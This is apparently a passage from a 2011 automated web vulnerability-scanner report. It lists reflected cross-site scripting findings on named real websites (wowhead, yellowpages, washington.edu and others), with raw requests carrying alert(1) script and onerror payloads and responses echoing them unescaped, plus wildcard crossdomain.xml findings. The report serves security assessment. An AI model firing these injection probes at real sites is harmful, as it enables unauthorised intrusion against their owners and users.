HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:59:57 GMT Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7a PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: _tnetses=4d972bdd7eed3; path=/; domain=.thomasnet.com Set-Cookie: _usrvst=1; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com Set-Cookie: tnuind=%7C; path=/; domain=.thomasnet.com Set-Cookie: am1vst=1; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com Set-Cookie: am1rm=PP; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com Set-Cookie: tbv2ns=Y; path=/; domain=.thomasnet.com Set-Cookie: tbv2showPushDown=Y; path=/; domain=.thomasnet.com Set-Cookie: am1cmp=1; path=/; domain=.thomasnet.com Set-Cookie: referq=deleted; expires=Fri, 02-Apr-2010 13:59:56 GMT; path=/; domain=.thomasnet.com Set-Cookie: UUS=4d972bdd7f6a8; path=/; domain=.thomasnet.com Set-Cookie: us=4d972bdd7f6a8; path=/; domain=.thomasnet.com Set-Cookie: GID=G13017527975219; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com Set-Cookie: tinid=deleted; expires=Fri, 02-Apr-2010 13:59:56 GMT; path=/; domain=.thomasnet.com Set-Cookie: UUID=deleted; expires=Fri, 02-Apr-2010 13:59:56 GMT; path=/; domain=.thomasnet.com Content-Type: text/html; charset=ISO-8859-1 Content-Length: 21410 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en-US"> <head> <META name="y_key" content="6e6d842e318a7ef3 <meta name="verify-v1" ...[SNIP]... <a href="/print/screen ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.tradekey.com |
Path: | /favicon.ico |
GET /favicon.ico77a87'-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.tradekey.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:57:15 GMT Server: Apache Set-Cookie: PHPSESSID=bfc0f1346d Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: User-Agent,Accept Connection: close Content-Type: text/html Content-Length: 21900 <html dir=ltr> <head> <title>Error 404 Page not found, Business to Business marketplace, Manufacturer directory & import export</title> <link href="http://imgusr ...[SNIP]... Date(); var d = t.getDate() + "-" + t.getMonth()+1 + "-" + t.getFullYear(); if (seconds > 1 || d == "20-01-2011") tk_track_ga_event('IT', 'Page Render Time - www.tradekey.com', '/favicon.ico77a87'-alert(1)- } var old_load_fx = window.onload; window.onload = function() { track_page_render_time(); if (old_load_fx) old_load_fx(); } </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.trails.com |
Path: | /favicon.ico |
GET /favicon.icoece72'-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.trails.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 21954 Expires: Sat, 02 Apr 2011 13:38:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:38:51 GMT Connection: close Set-Cookie: ASP.NET_SessionId <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... ils.com', jscdn: 'http://cdn2-www.trails logout: 'https://ssl.trails.com login: 'https://ssl.trails.com signup: 'https://ssl.trails.com account: 'https://ssl.trails.com profile: 'http://www.trails.com }, user: { name: ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.travelpod.com |
Path: | /favicon.ico |
GET /favicon.ico7550a"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.travelpod.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:11:07 GMT Server: Apache Content-language: " Vary: Accept-Encoding Content-Type: text/html; charset=ISO-8859-1 Content-Length: 7980 <html xmlns="http://www.w3.org <head> <title>Oh, Ohhh ...</title> <link rel="shortcut icon" href="/favicon.ico"/> <script type="text/javascript" ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.videojug.com |
Path: | /favicon.ico |
GET /f6eb1'-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.videojug.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Cache-Control: private Content-Length: 20692 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: VideoJugUser=YnFn6uA Set-Cookie: abTest=0; expires=Sat, 30-Apr-2011 13:57:58 GMT; path=/ Set-Cookie: ASP.NET_SessionId Set-Cookie: VjPrefEd=cc=US&ed=3; expires=Tue, 02-Apr-2013 13:57:58 GMT; path=/ Set-Cookie: AuthCookie=false; expires=Mon, 04-Apr-2011 13:57:58 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:57:57 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a class="m mixFlag big UK" href="/chooseedition ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.videosurf.com |
Path: | /favicon.ico |
GET /favicon.ico88f07"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.videosurf.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.0 404 Not Found Date: Sat, 02 Apr 2011 13:39:23 GMT Server: Apache/2.2.16 (Ubuntu) X-Powered-By: PHP/5.3.3-1ubuntu9.3 Set-Cookie: PHPSESSID=rm91d0siee Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: vsb=95; expires=Sun, 01-Apr-2012 13:39:23 GMT; path=/; domain=.videosurf.com Set-Cookie: VSID=4d97270b593c3; expires=Sun, 01-Apr-2012 13:39:23 GMT; path=/; domain=.videosurf.com Set-Cookie: luri=L2Zhdmljb24uaWN Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <meta property="og:url" content="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.walletpop.com |
Path: | /favicon.ico |
GET /bc0cc"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.walletpop.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:20:26 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Set-Cookie: GEO-173_193_214_243=-%3A Content-Type: text/html Content-Length: 34369 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.washington.edu |
Path: | /favicon.ico |
GET /favicon.icocaf60<img%20src%3da User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.washington.edu Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:19:39 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1 X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1174 Content-Type: text/html <html> <head><title>URL Not Found</title></head> <body> <h1>URL Not Found</h1> <b>http://www.washington ...[SNIP]... <br> Reason: File does not exist: /www/world/favicon.icocaf60<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.wowhead.com |
Path: | /favicon.ico |
GET /favicon.ico919c3"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.wowhead.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:33:32 GMT Server: Apache X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-cache, must-revalidate, max-age=604800 Expires: Sat, 09 Apr 2011 13:33:32 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8308 <!DOCTYPE html> <html> <head> <title>Page Not Found - Wowhead</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="It appears that the ...[SNIP]... <body class="favicon_ico919c3"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.wowhead.com |
Path: | /favicon.ico |
GET /favicon.ico6a6c7'-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.wowhead.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:33:33 GMT Server: Apache X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-cache, must-revalidate, max-age=604800 Expires: Sat, 09 Apr 2011 13:33:33 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8122 <!DOCTYPE html> <html> <head> <title>Page Not Found - Wowhead</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="It appears that the ...[SNIP]... <![CDATA[ var g_pageInfo = { articleUrl: 'favicon.ico6a6c7'-alert(1)- //]]> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.yakaz.com |
Path: | /favicon.ico |
GET /favicon.icod0b98<img%20src%3da User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.yakaz.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Server: Yakaz Web Server Date: Sat, 02 Apr 2011 13:59:51 GMT Content-Length: 93174 Content-Type: text/html; charset=utf-8 Set-Cookie: il=en; expires=Sun, 01-Apr-2012 13:59:51 GMT; path=/; domain=.yakaz.com Set-Cookie: YSID=63238dac50279b2 Set-Cookie: infos=deleted; expires=Fri, 02-Apr-2010 13:59:50 GMT; path=/; domain=.yakaz.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org xmlns:v="urn:schemas ...[SNIP]... <h1>Favicon.icod0b98<img Src=a Onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.yellowpages |
Path: | /favicon.ico |
GET /54dd2</script><a User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.yellowpages.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:44:27 GMT Status: 200 OK Connection: keep-alive Server: nginx Content-Type: text/html; charset=utf-8 ETag: "efc9b484b7207b82659 Cache-Control: no-cache Set-Cookie: search_terms=script%3E Set-Cookie: parity_analytics=---+%0A Set-Cookie: vrid=de53bf40-3f54-012e Set-Cookie: _parity_session Set-Cookie: b=10011; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT X-Urid: d-ddea1480-3f54-012e-fd15 Expires: Sat, 02 Apr 2011 12:44:26 GMT Content-Length: 324385 <!DOCTYPE html> <html> <head> <title>No Location Found - YP.com</title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type" /> <meta content="" name="description" /> <meta content="" n ...[SNIP]... aq.push(['_setAllowAnchor _gaq.push(['_setDoma _gaq.push(['_setCustomVar _gaq.push(['_trackPa (function() { var s, ga = document.createElement( ga.src = "http://www.goo ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.yellowpages |
Path: | /favicon.ico |
GET /c496d<img%20src%3da User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.yellowpages.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:44:41 GMT Status: 200 OK Connection: keep-alive Server: nginx Content-Type: text/html; charset=utf-8 X-Runtime: 706 ETag: "3e44fe57bd9f1ca7ae2 Cache-Control: no-cache Set-Cookie: parity_analytics=---+%0A Set-Cookie: vrid=e7021120-3f54-012e Set-Cookie: _parity_session Set-Cookie: b=10010; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT X-Urid: d-e6a5db50-3f54-012e-19bb Expires: Sat, 02 Apr 2011 12:44:40 GMT Content-Length: 322976 <!DOCTYPE html> <html> <head> <title>C496d<Img Src=A Onerror=Alert(1) <meta content="text/html; charset=utf-8" http-equiv="Content-Type" /> <meta content="C496d<Img Sr ...[SNIP]... <h3 class="title">C496d<Img Src=A Onerror=Alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.yourdictionary |
Path: | /favicon.ico |
GET /favicon.icobbb5b"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.yourdictionary.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:58:33 GMT Server: Apache Vary: Host,Accept-Encoding,User X-Powered-By: PHP/5.3.3 Cache-Control: max-age=5184000 Expires: Wed, 01 Jun 2011 13:58:33 GMT X-LTK-Server: yd-ec2-www Content-Type: text/html Content-Length: 8919 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <meta property="og:url" content="http://www ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.kcom.com |
Path: | /contact-us/ |
GET /contact-us/ HTTP/1.1 Host: www.kcom.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: exp_last_visit=986389016; __utmz=90957184 |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:00:51 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Set-Cookie: exp_last_activity Set-Cookie: exp_tracker=a%3A2%3A%7Bi Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Sat, 02 Apr 2011 14:00:51 GMT Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 12351 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <META HTTP-EQUIV="Content-t ...[SNIP]... <input type="hidden" id="00N300000055kEx" name="00N300000055kEx" title="Web-to-lead URL" value="KCOM Site - http://www.google.com ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.canada.com |
Path: | /favicon.ico |
GET /f1d63'%3ba353fa99bdc HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.canada.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www2.canada.com Content-Type: text/html; charset=utf-8 Expires: Sat, 02 Apr 2011 13:41:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:41:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 3579 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="http://www2.canada </body></html> <form name="frmPage" method="po ...[SNIP]... - /* You may give each page an identifying name, server, and channel on the next lines. */ s.pageName='/canada/www s.server=window.location s.channel='Canada'; s.pageType=''; s.p ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.multiply.com |
Path: | /favicon.ico |
GET /favicon.ico49add"style%3d"x User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.multiply.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 302 Found Date: Sat, 02 Apr 2011 13:37:45 GMT Server: Apache/1.3.29 (Unix) mod_perl/1.29 Set-Cookie: uid=A:1:U2FsdGVkX183 Set-Cookie: session=1301751465 Set-Cookie: initial_anon_referrer=; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT Set-Cookie: session=1301751465: Location: http://multiply.com P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa TAIa PSAa PSDa OUR NOR PHY UNI COM DEM PRE" Expires: Wed, 13 Apr 2005 10:02:00 GMT Pragma: no-cache Cache-Control: max-age=0 Content-Type: text/html; charset=utf-8 X-Cache: MISS from multiply.com Connection: close Content-Length: 1245 HTTP/1.1 302 Found Date: Sat, 02 Apr 2011 13:37:45 GMT Server: Apache/1.3.29 (Unix) mod_perl/1.29 Set-Cookie: uid=A:1:U2FsdGVkX183 ...[SNIP]... <A HREF="http://multiply.com ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.multiply.com |
Path: | /favicon.ico |
GET /favicon.icoff3a1<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.multiply.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 302 Found Date: Sat, 02 Apr 2011 13:37:45 GMT Server: Apache/1.3.29 (Unix) mod_perl/1.29 Set-Cookie: uid=A:1:U2FsdGVkX18s Set-Cookie: session=1301751465 Set-Cookie: initial_anon_referrer=; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT Set-Cookie: session=1301751465: Location: http://multiply.com P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa TAIa PSAa PSDa OUR NOR PHY UNI COM DEM PRE" Expires: Wed, 13 Apr 2005 10:02:00 GMT Pragma: no-cache Cache-Control: max-age=0 Content-Type: text/html; charset=utf-8 X-Cache: MISS from multiply.com Connection: close Content-Length: 1245 HTTP/1.1 302 Found Date: Sat, 02 Apr 2011 13:37:45 GMT Server: Apache/1.3.29 (Unix) mod_perl/1.29 Set-Cookie: uid=A:1:U2FsdGVkX18s ...[SNIP]... res=Tuesday, 29-Jul-2014 23:12:40 GMT Set-Cookie: session=1301751465: Location: http://multiply.com Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.multiply.com |
Path: | /favicon.ico |
GET /favicon.ico?1f694<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.multiply.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 302 Found Date: Sat, 02 Apr 2011 13:37:40 GMT Server: Apache/1.3.29 (Unix) mod_perl/1.29 Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT Location: http://multiply.com P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa TAIa PSAa PSDa OUR NOR PHY UNI COM DEM PRE" Expires: Wed, 13 Apr 2005 10:02:00 GMT Pragma: no-cache Cache-Control: max-age=0 Content-Type: text/html; charset=utf-8 X-Cache: MISS from multiply.com Connection: close Content-Length: 757 HTTP/1.1 302 Found Date: Sat, 02 Apr 2011 13:37:40 GMT Server: Apache/1.3.29 (Unix) mod_perl/1.29 Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT Location: http://multiply.com Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.shop.com |
Path: | /favicon.ico |
GET /favicon.ico?91c6c"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.shop.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 302 URL Redirect Server: AMOS/1.0 Date: Sat, 02 Apr 2011 13:41:31 GMT Content-Type: text/html Content-Length: 351 Location: http://edge.shop.com Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache <html><head><title <META URL=http://edge.shop.com </head> <body><h1>Object Moved</h1>This docum ...[SNIP]... <a href="http://edge.shop ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.shop.com |
Path: | /favicon.ico |
GET /favicon.ico?5a1e2><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.shop.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 302 URL Redirect Server: AMOS/1.0 Date: Sat, 02 Apr 2011 13:41:31 GMT Content-Type: text/html Content-Length: 349 Location: http://edge.shop.com Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache <html><head><title <META URL=http://edge.shop.com </head> <body><h1>Object Moved</h1>This docume ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.shopcompanion |
Path: | /favicon.ico |
GET /favicon.ico?9fa44><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.shopcompanion.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 302 URL Redirect Server: AMOS/1.0 Date: Sat, 02 Apr 2011 14:00:40 GMT Content-Type: text/html Content-Length: 349 Location: http://edge.shop.com Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache <html><head><title <META URL=http://edge.shop.com </head> <body><h1>Object Moved</h1>This docume ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.shopcompanion |
Path: | /favicon.ico |
GET /favicon.ico?bd1a5"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.shopcompanion.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 302 URL Redirect Server: AMOS/1.0 Date: Sat, 02 Apr 2011 14:00:40 GMT Content-Type: text/html Content-Length: 351 Location: http://edge.shop.com Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache <html><head><title <META URL=http://edge.shop.com </head> <body><h1>Object Moved</h1>This docum ...[SNIP]... <a href="http://edge.shop ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.townhall.com |
Path: | /favicon.ico |
GET /favicon.ico?3412a<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.townhall.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 301 Moved Permanently Server: Microsoft-IIS/6.0 Vary: Accept-Encoding Cache-Control: no-cache Content-Type: text/html Date: Sat, 02 Apr 2011 14:05:57 GMT Location: http://townhall.com Pragma: no-cache X-PoolName: X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache" Content-Length: 249 <html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.townhall.com |
Path: | /favicon.ico |
GET /favicon.ico?39dc7"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.townhall.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 301 Moved Permanently Server: Microsoft-IIS/6.0 Vary: Accept-Encoding Cache-Control: no-cache Content-Type: text/html Date: Sat, 02 Apr 2011 14:05:57 GMT Location: http://townhall.com Pragma: no-cache X-PoolName: X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache" Content-Length: 253 <html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 258 Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT Date: Sat, 02 Apr 2011 12:56:49 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.doubleclick <cross-domain-policy> ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fls.doubleclick |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: fls.doubleclick.net |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Sat, 02 Apr 2011 03:31:36 GMT Expires: Thu, 31 Mar 2011 03:30:21 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 37531 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!-- Policy file for http://www.doubleclick <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s0.2mdn.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: s0.2mdn.net |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Sat, 02 Apr 2011 11:30:43 GMT Expires: Thu, 31 Mar 2011 11:30:14 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 5168 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!-- Policy file for http://www.doubleclick <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://smp.adviva.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: smp.adviva.net |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:57:10 GMT Server: Apache/2.2.11 (Unix) mod_perl/2.0.4 Perl/v5.10.0 Last-Modified: Tue, 17 Nov 2009 11:38:46 GMT ETag: "c20ce1-110-4788f91a4dd80 Accept-Ranges: bytes Content-Length: 272 Connection: close Content-Type: application/xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://ads.specificmedia <cross-d ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.43things.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.43things.com |
